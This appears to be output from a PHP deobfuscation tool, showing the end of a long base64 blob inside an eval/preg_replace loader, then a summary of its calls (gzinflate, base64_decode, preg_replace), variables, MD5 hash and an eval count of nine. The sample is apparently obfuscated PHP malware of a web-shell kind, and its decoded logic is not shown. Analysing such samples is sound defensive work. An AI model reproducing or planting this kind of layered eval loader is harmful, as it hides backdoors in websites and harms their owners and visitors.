dknEMriKlFAAKXId+DFDmfKGocGiiDSjjgHFqint0P3So1gsDvqC8pt6V8iiiex7TWBKDfV2KzjUEMbR9X3GKRYp0002AixAC1I4OzNxJCI4AAulfB1JkM43r24Z9AF1YZ9RmUROoqs92WiRGY4uXCeze6meF0Zh86gjXcaLfW4ajPGVh48xOKsxPy4EkiIUuFn+LHz1IeYVz1HOurZmJARcc1FfAenBqpTCx6I98+FpJ2bXh+UoaA+rZGSVD4D+GDbZ5ITW1OvcApB8nK4DVm0vRnmIE+yqi3hA169nT5H7uvHnGu/MBTOuvyVBttwovdhdVO+uTA2X6jE4eJg7Rb76/8MCuwTZHNV8ywnoF239h2LTeLDdpDcuUgLfV85Yw0TP4uPK/N4d7dPx0dCRTnjTC/FMU0p4qKzI/9WrZa75o/jQ58MfcDJv7ffQ3mxD41cqrK0A8h+NjFLR4OhC6GBNK5Ghj80TL5C1NH9wkBrTKT5yY3+FkMNrhYj2vCgzdPS3N6f25U4xzl6Rnoerhfb11TNyI9i1Gfn4pex1e+H3tAK3SQOgQFMkbXnxCDlYPAVzBz0xVK5VnxOFlN/NxniaQe5cBVoCd8NW0I5gPeSKajQhri60wyL2/HBUOLOe0UwdkXpZy/WGWZU8NI/8rs2h5xU2f6KyyTI9dTqwY+wVjUlp7Oibdp9M3OsIf6XKfCw7tt2PpzgzrAEjDVrZ+gjMbohm3yNaevuA+XA4Of24oKRurw94DX50Xd3NtwygRQo+zOnExJ2zd3IflJDFrTeUKbQEYw5v0yAyaD04+/+1T9WwxTAVPm45kt08fvICJE41Qh6A2qxLNvare9HHzKbjMzAWjdhD2BApXIAd1LOUowYLzXGAnmrWp8T3K1Anu0ZS6jJg4DxR8SbuXsSJE+AzMedKlb0VToLU7QaLLFUNP1hr5dJ2x7Ra2GOE/pidpTmR2fe6vIp/dmoyuwMItoPPurirHs8lN+YlaeXmI7X5Q2YSb1x5EMT4euXnQobbewqox9nD3jL6zwFwn/RBKoGr3bsNSvNi6CQPF3XcNT8z5chLOOeC/gTuxARSgHxFYocJr07jt+dtdn1XOrOuuNqiX4U/A5fpPGUkwAq/Vd6/hPe0CBRXMaGUCh5/giynYs6cFNa7UXQIzTY0KBRAuEkSN9zA5eEGUEO8W5dLK6OT62FGKNWyKJaqiV7YSRpll0zcjm9l49IWZShhdXxDCMDP4xE0Ml9mJmNZAsIQfosP+U//rwR+v8ayv7xzz/++Pf/+h8='\x29\x29\x29\x3B","");
?>

Function Calls

gzinflate 5
drisdi70361 1
preg_replace 4
base64_decode 5

Variables

$a base64_decode
$b gzinflate
$str 7T3bVhvHsu9ZK//QnhBGisXoAphsicGRQcQk2PiAnKxszJJHmpbUYS7KXADh..

Stats

MD5 749980ee9eee5c350fd4d3947533cf2e
Eval Count 9
Decode Time 124 ms